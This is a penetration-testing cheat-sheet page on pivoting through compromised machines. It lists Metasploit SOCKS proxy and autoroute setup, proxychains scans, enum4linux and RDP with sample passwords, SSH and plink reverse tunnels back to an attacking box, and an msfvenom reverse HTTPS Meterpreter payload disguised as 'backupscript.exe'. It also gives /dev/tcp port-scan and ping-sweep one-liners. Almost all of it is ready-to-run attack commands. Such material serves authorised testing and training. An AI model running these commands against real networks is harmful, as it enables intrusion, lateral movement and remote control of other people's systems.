Pivoting and double pivoting

In this section, we explore how to set up a SOCKS4a proxy using Metasploit and configure Proxychains4 to route traffic through your proxy. We will explore pivoting and double pivoting

Setting Up SOCKS4a Proxy and Proxychains

Configure Metasploit's SOCKS4a Proxy Service:
```
use auxiliary/server/socks4a
set SRVPORT 9050
```
This command sets up a SOCKS4a proxy server on port 9050 using Metasploit.
Configure Proxychains4:
```
cat /etc/proxychains4.conf
socks5 127.0.0.1 9050
```
Edit the Proxychains configuration file to ensure it routes through the SOCKS5 proxy on localhost at port 9050.

Verify Proxy Service and Use Proxychains with Nmap

Verify the Process Running:
```
netstat -atn
```
Use netstat to verify the proxy service is running on the desired port.
Scan Network via Proxychains Using Nmap:
```
proxychains nmap -sT -Pn 
proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445
```
Use Proxychains with Nmap to scan a target machine through the proxy.

Pivoting and Network Scanning

Set Up Autoroute via Metasploit Session:
```
use post/multi/manage/autoroute
set session 
exploit
```
Configure autoroute for a Metasploit session to route traffic through a compromised machine's subnet.

Enumeration and Remote Desktop Protocol (RDP) via proxychains

Run Enumeration with Proxychains:
```
sudo proxychains -q enum4linux -a -u administrator -p Pa$$w0rd 192.168.5.100
```
Use Proxychains to run the enum4linux script, targeting a specific machine for enumeration.
Use RDP via Proxychains:
```
proxychains rdesktop -u administrator -p Pa$$w0rd123 192.168.5.100:3389
```
Connect to a machine using Remote Desktop Protocol through Proxychains.

SSH Port Forwarding

Perform Multiple Local Port Forwardings with SSH:
```
ssh root@192.168.110.10 -L 3389:192.168.110.138:3389 -L 5985:192.168.110.138:5985 -L 5986:192.168.110.131:5985
```
Forward multiple ports from a target machine to the local machine using an SSH connection.
Perform Simple Port Forwarding:
```
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN
```
Forward port 80 of the target host (172.16.0.10) to port 8000 on the local machine, running SSH in the background with -fN.

Reverse Shell and Port Forwarding with Metasploit via pivoting

This guide demonstrates how to set up a remote port forwarding configuration and generate a Meterpreter payload for penetration testing.

Remote Port Forwarding Setup:
Use SSH to set up remote port forwarding. This enables rerouting connections from a remote server to a local service.
```
ssh -R 192.168.5.45:4444:0.0.0.0:4444 vagrant@192.168.56.200 -vN
```
Now, forward traffic to another internal pivot host by specifying the internal IP and desired port:
```
ssh -R <InternalIPPivotHost>:8080:0.0.0.0:8000 ubuntu@<TargetIP> -vN
```
Generate Meterpreter Payload:
Create a reverse HTTPS Meterpreter payload using msfvenom. This payload should connect back to your pivot host's internal IP.
```
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080
```

Note: Ensure you replace <InternalIPPivotHost> and <TargetIP> with actual IP addresses. Remember to set the internal IP of the pivot host as LHOST during the payload creation.

Metasploit Commands for Port Forwarding:
```
portfwd
route
arp
getproxy
```
- portfwd: Port forward a port from the remote machine.
- route: Manage routes within Metasploit.
- arp: View or manipulate the ARP cache.
- getproxy: Create a proxy within Metasploit.

Reverse port forwarding

To implement reverse port forwarding when you have a shell on a machine but no SSH access, follow these steps. This technique allows the target machine to open a tunnel back to your attacking system. Reverse port forward is useful for machines where you have a shell but no SSH. You can then make a reverse port forward by having the tunnel created from the target to you attacking box.

# Generate an SSH key pair if you don't have one
ssh-keygen

Explanation: This command creates a private and public SSH key pair, essential for secure connections.

# Edit the authorized keys on your machine to restrict the key to port forwarding only
echo 'command="echo This account can only be used for port forwarding",no-agent-forwarding,no-x11-forwarding,no-pty ssh-rsa ...' >> ~/.ssh/authorized_keys

Explanation: This restriction ensures the key is only used for port forwarding, preventing shell access to your attacking machine.

# Check the status of the SSH service
sudo systemctl status ssh

Explanation: Use this command to ensure the SSH service is running correctly on your system.

# Optionally, kill a specific SSH connection if needed
sudo kill [PID]

Explanation: Replace [PID] with the process ID of the SSH connection you wish to terminate.

# Set up reverse port forwarding 
# ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN
ssh -R 22:172.16.0.100:2222 kali@172.16.0.200 -i id_rsa -fN

Explanation: This command creates a reverse port forwarding from port 22 of the remote machine (172.16.0.100) to port 2222 of your local machine, using the keyfile id_rsa. The -fN option backgrounds the session after setting up the tunnel. This sets up a tunnel from the target's port 22 to your local machine's port 2222.

Discover hosts through a pivot using Living Of The Land tools

This is useful if the target does not have nmap installed of if you do not want to make a lot of noises while scanning the internal network. We can use Living Of The Land tools that are build in.

Linux: Discovering Live Hosts on a Network:
This Bash one-liner will ping each IP address in the range of 192.168.1.1 to 192.168.1.255, reporting back any live hosts that respond to the ping.

for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

Linux : Scanning Open Ports on a Target:
This command will attempt to connect to each port from 1 to 65535 on the target IP (192.168.1.1) and will report any open ports.

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open;

Pivoting and double pivoting (SSH Dynamic port forwarding)

To configure SSH dynamic port forwarding, use the following commands:

Edit the /etc/proxychains.conf
1. Add the following line to create a proxychain on your localhost on port 1080

Cat etc/proxychains4.conf 
socks5 127.0.0.1 1080

Initiate Dynamic Port Forwarding

To set up dynamic port forwarding over SSH, use the following command. This example listens on port 1080 and forwards traffic through the specified username@hostname:

ssh -D 1080 username@hostname

This command establishes an SSH tunnel that acts as a SOCKS proxy, allowing you to route traffic securely.

Add Options for Background Operation
To run the SSH session in the background, which is useful for maintaining the tunnel without keeping an active terminal session open, use the -f option:
```
ssh -D 1080 -f -C -q -N username@hostname
```
- -f: Requests SSH to go to the background just before command execution.
- -C: Enables compression of data, if possible.
- -q: Quiet mode; suppresses most warning and diagnostic messages.
- -N: Tells SSH not to execute a remote command, useful for just forwarding ports.
Proxychains <TOOL>
1. Once the tunnel is established we can use proxychains with our favorite tool to reach the internal network

proxychains curl http://192.168.69.102
proxychains nmap
proxychains hydra

Splink.exe - Windows only

Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers; however, it is still a very useful tool, so we will cover it here.

# Creates a reverse port forward from the target to your attacking box
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

2. Example of Reverse Port Forwarding

# Forwards a connection from 172.16.0.10:80 to port 8000 on your attacking machine (172.16.0.20)
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N

3. Convert SSH Key for Plink

# Converts an SSH key to a format usable by Plink
puttygen KEYFILE -o OUTPUT_KEY.ppk

4. Install putty-tools on Kali Linux

# Installs the putty-tools package on Kali Linux
sudo apt install putty-tools

These commands cover the process of setting up reverse port forwarding using plink.exe, converting SSH keys for use with Plink, and installing necessary tools on Kali Linux.

PreviousFirewall evasion NextBad USB - Rubber Duckies

Last updated 6 months ago